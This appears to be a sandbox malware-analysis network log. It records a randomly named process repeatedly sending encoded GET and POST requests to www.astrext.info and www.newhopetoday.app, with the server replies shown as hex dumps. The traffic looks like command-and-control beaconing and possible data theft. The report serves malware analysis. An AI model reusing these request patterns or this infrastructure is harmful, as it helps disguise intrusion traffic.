                                                                                    12192.168.2.450015217.160.0.132802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:34:11.708276987 CET524OUTGET /8u3q/?9hCtofh=cm4ubz77/lIwMrhjFRgV76IEwgYIQWLXxQMTOGkT00YioQcuvl4ad7FbuK2ZVTUxGoXbXPFIPc1cKkfmvUrJeif3yFVy05no8pqYeg1JIWdJs5qV9s4yrtw=&DxvPV=zbk0AVfPEjjhe HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Host: www.astrext.info
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:34:12.569300890 CET1236INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 1271
                                                                                    Connection: close
                                                                                    Date: Wed, 06 Nov 2024 19:34:12 GMT
                                                                                    Server: Apache
                                                                                    X-Frame-Options: deny
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
                                                                                    Nov 6, 2024 20:34:12.569454908 CET203INData Raw: 20 20 20 20 20 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 20 2b 20 27 2f 27 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 27 49 4f 4e 4f 53 50 61 72 6b 69 6e 67 55 4b 27 0a
                                                                                    Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.450016216.40.34.41802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:34:18.504647017 CET793OUTPOST /f83s/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.newhopetoday.app
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 204
                                                                                    Origin: http://www.newhopetoday.app
                                                                                    Referer: http://www.newhopetoday.app/f83s/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 59 67 32 71 35 6f 5a 2f 5a 6f 4b 6f 59 50 65 79 67 7a 31 6b 6f 58 31 2b 74 4b 73 64 70 6d 49 51 72 43 45 30 58 4a 54 64 62 4e 70 6f 50 6b 4b 5a 6f 66 50 69 2f 69 38 6f 45 66 62 35 58 37 36 66 54 48 65 64 44 75 63 56 70 35 4b 4f 44 39 76 55 34 45 33 57 4a 34 5a 4b 43 38 6e 4c 71 37 52 56 47 34 79 48 2b 72 42 56 4c 77 74 68 45 6c 50 33 77 35 63 74 36 55 34 54 67 71 5a 49 70 32 6f 57 75 43 58 50 71 6f 4f 4d 78 6b 42 7a 4c 43 4e 58 4e 30 6f 59 37 47 2b 64 6b 78 64 62 65 53 70 6f 61 6e 37 4b 5a 73 75 6b 33 47 36 39 64 59 50 6b 79 5a 45 50 72 73 47 48 78 37 7a 6a 42 70 68 49 69 77 3d 3d
                                                                                    Data Ascii: 9hCtofh=Yg2q5oZ/ZoKoYPeygz1koX1+tKsdpmIQrCE0XJTdbNpoPkKZofPi/i8oEfb5X76fTHedDucVp5KOD9vU4E3WJ4ZKC8nLq7RVG4yH+rBVLwthElP3w5ct6U4TgqZIp2oWuCXPqoOMxkBzLCNXN0oY7G+dkxdbeSpoan7KZsuk3G69dYPkyZEPrsGHx7zjBphIiw==
                                                                                    Nov 6, 2024 20:34:19.192116976 CET1236INHTTP/1.1 404 Not Found
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    x-request-id: 820f1639-7703-49a9-b928-7b8dd944ccdb
                                                                                    x-runtime: 0.020687
                                                                                    content-length: 17134
                                                                                    connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                    Nov 6, 2024 20:34:19.192135096 CET212INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; }
                                                                                    Nov 6, 2024 20:34:19.192169905 CET1236INData Raw: 20 20 20 2e 73 6f 75 72 63 65 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 39 44 39 44 39 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 45 43 45 43 45 43 3b 0a 20 20 20 20 20 20 77 69 64
                                                                                    Data Ascii: .source { border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; bac
                                                                                    Nov 6, 2024 20:34:19.192275047 CET1236INData Raw: 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 20 74 65 78 74 66 69 65 6c 64 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 62 6f 64 79 20 74 72 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f
                                                                                    Data Ascii: it-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches {
                                                                                    Nov 6, 2024 20:34:19.192287922 CET424INData Raw: 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 3c 68 32 3e 4e 6f 20 72 6f 75 74 65 20 6d 61 74 63 68 65 73 20 5b 50 4f 53 54 5d 20 26 71 75 6f 74 3b 2f 66 38 33
                                                                                    Data Ascii: Error</h1></header><div id="container"> <h2>No route matches [POST] &quot;/f83s&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#
                                                                                    Nov 6, 2024 20:34:19.192414045 CET1236INData Raw: 77 6f 72 6b 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e 46 72 61 6d 65 77 6f 72 6b 20 54 72 61 63 65 3c 2f 61 3e 20 7c 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 23 22 20 6f 6e 63 6c 69 63 6b 3d 22 68
                                                                                    Data Ascii: work-Trace&#39;);; return false;">Framework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" sty
                                                                                    Nov 6, 2024 20:34:19.192425013 CET212INData Raw: 63 74 69 6f 6e 70 61 63 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 71 75 65 73 74 5f 69 64 2e 72 62 3a 32 37 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61
                                                                                    Data Ascii: ctionpack (5.2.6) lib/action_dispatch/middleware/request_id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class=
                                                                                    Nov 6, 2024 20:34:19.192436934 CET1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60
                                                                                    Data Ascii: "trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call
                                                                                    Nov 6, 2024 20:34:19.192624092 CET1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33
                                                                                    Data Ascii: "trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-f
                                                                                    Nov 6, 2024 20:34:19.192636013 CET1236INData Raw: 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72
                                                                                    Data Ascii: d_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache
                                                                                    Nov 6, 2024 20:34:19.197045088 CET1236INData Raw: 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68
                                                                                    Data Ascii: r.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceF


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.450017216.40.34.41802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:34:21.293756008 CET813OUTPOST /f83s/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.newhopetoday.app
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 224
                                                                                    Origin: http://www.newhopetoday.app
                                                                                    Referer: http://www.newhopetoday.app/f83s/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Raw: 39 68 43 74 6f 66 68 3d 59 67 32 71 35 6f 5a 2f 5a 6f 4b 6f 65 66 75 79 76 30 70 6b 74 33 31 39 70 36 73 64 67 47 49 55 72 43 59 30 58 4d 72 4e 62 37 35 6f 4d 42 75 5a 76 61 6a 69 34 69 38 6f 51 76 62 38 49 72 36 57 54 48 69 7a 44 71 55 56 70 36 32 4f 44 34 72 55 34 31 33 58 49 6f 5a 4d 62 73 6e 4a 6b 62 52 56 47 34 79 48 2b 72 56 7a 4c 77 6c 68 45 57 58 33 7a 59 64 66 6b 45 34 53 6e 71 5a 49 69 57 6f 61 75 43 58 74 71 70 69 32 78 6e 35 7a 4c 48 78 58 4b 68 45 66 31 32 2b 66 71 52 63 54 51 68 55 77 53 46 32 32 52 4f 47 43 33 45 6d 51 59 65 43 2b 6a 6f 6c 59 35 73 69 30 73 38 36 58 4d 71 63 42 35 78 2f 45 6f 58 66 47 6f 6b 58 57 68 2b 7a 6d 4b 51 2f 7a 32 67 41 3d
                                                                                    Data Ascii: 9hCtofh=Yg2q5oZ/ZoKoefuyv0pkt319p6sdgGIUrCY0XMrNb75oMBuZvaji4i8oQvb8Ir6WTHizDqUVp62OD4rU413XIoZMbsnJkbRVG4yH+rVzLwlhEWX3zYdfkE4SnqZIiWoauCXtqpi2xn5zLHxXKhEf12+fqRcTQhUwSF22ROGC3EmQYeC+jolY5si0s86XMqcB5x/EoXfGokXWh+zmKQ/z2gA=
                                                                                    Nov 6, 2024 20:34:21.978986025 CET1236INHTTP/1.1 404 Not Found
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    x-request-id: cf5e617c-69d7-4f8d-a09a-87f3e3aab378
                                                                                    x-runtime: 0.021751
                                                                                    content-length: 17154
                                                                                    connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                    Nov 6, 2024 20:34:21.979021072 CET1236INData Raw: 70 72 65 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 70 78 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a
                                                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px
                                                                                    Nov 6, 2024 20:34:21.979034901 CET424INData Raw: 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74 61 62 6c
                                                                                    Data Ascii: } #route_table thead tr.bottom { border-bottom: none; } #route_table thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; }
                                                                                    Nov 6, 2024 20:34:21.979124069 CET1236INData Raw: 5f 74 61 62 6c 65 20 74 62 6f 64 79 2e 66 75 7a 7a 79 5f 6d 61 74 63 68 65 73 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 4c 69 67 68 74 47 6f 6c 64 65 6e 52 6f 64 59 65 6c 6c 6f 77 3b 0a 20 20 20 20 62 6f 72 64 65
                                                                                    Data Ascii: _table tbody.fuzzy_matches { background-color: LightGoldenRodYellow; border-bottom: solid 2px SlateGrey; } #route_table tbody.exact_matches tr, #route_table tbody.fuzzy_matches tr { background: none; border-bottom: none;
                                                                                    Nov 6, 2024 20:34:21.979135990 CET1236INData Raw: 63 65 26 23 33 39 3b 29 3b 68 69 64 65 28 26 23 33 39 3b 46 75 6c 6c 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 73 68 6f 77 28 26 23 33 39 3b 41 70 70 6c 69 63 61 74 69 6f 6e 2d 54 72 61 63 65 26 23 33 39 3b 29 3b 3b 20 72 65 74 75 72 6e 20 66 61 6c
                                                                                    Data Ascii: ce&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Application-Trace&#39;);; return false;">Application Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Full-Trace&#39;);show(&#39;Framework-Trace&#39;);; return false
                                                                                    Nov 6, 2024 20:34:21.979389906 CET1236INData Raw: 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 35 22 20 68 72 65 66 3d 22 23 22 3e
                                                                                    Data Ascii: _ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="6" href="#">actionpack (5.2.6) lib/action_di
                                                                                    Nov 6, 2024 20:34:21.979402065 CET1236INData Raw: 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73
                                                                                    Data Ascii: (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="15" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="16" href="#">puma (4.3.9)
                                                                                    Nov 6, 2024 20:34:21.979414940 CET848INData Raw: 6b 20 28 35 2e 32 2e 36 29 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63
                                                                                    Data Ascii: k (5.2.6) lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="5" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-i
                                                                                    Nov 6, 2024 20:34:21.979427099 CET1236INData Raw: 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 31 22 20 68 72 65 66 3d 22 23 22 3e 61 63 74 69 6f 6e 70 61 63 6b 20 28 35
                                                                                    Data Ascii: call&#39;</a><br><a class="trace-frames" data-frame-id="11" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/static.rb:127:in `call&#39;</a><br><a class="trace-frames" data-frame-id="12" href="#">rack (2.2.3) lib/rack/sendfile.rb:110
                                                                                    Nov 6, 2024 20:34:21.979440928 CET1236INData Raw: 66 72 61 6d 65 73 0a 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 74 72 61 63 65 46 72 61 6d 65 73 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 74 72 61 63 65 46 72 61 6d 65 73 5b 69 5d 2e 61 64 64
                                                                                    Data Ascii: frames for (var i = 0; i < traceFrames.length; i++) { traceFrames[i].addEventListener('click', function(e) { e.preventDefault(); var target = e.target; var frame_id = target.dataset.frameId; if (selec
                                                                                    Nov 6, 2024 20:34:21.984117985 CET1236INData Raw: 74 68 20 28 77 69 74 68 6f 75 74 20 74 68 65 20 68 74 74 70 20 6f 72 20 64 6f 6d 61 69 6e 29 22 20 68 72 65 66 3d 22 23 22 3e 50 61 74 68 3c 2f 61 3e 20 2f 0a 20 20 20 20 20 20 20 20 3c 61 20 64 61 74 61 2d 72 6f 75 74 65 2d 68 65 6c 70 65 72 3d
                                                                                    Data Ascii: th (without the http or domain)" href="#">Path</a> / <a data-route-helper="_url" title="Returns an absolute URL (with the http and domain)" href="#">Url</a> </th> <th> </th> <th> <input id="search" place


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.450018216.40.34.41802516C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Nov 6, 2024 20:34:23.847713947 CET10895OUTPOST /f83s/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.newhopetoday.app
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 10304
                                                                                    Origin: http://www.newhopetoday.app
                                                                                    Referer: http://www.newhopetoday.app/f83s/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
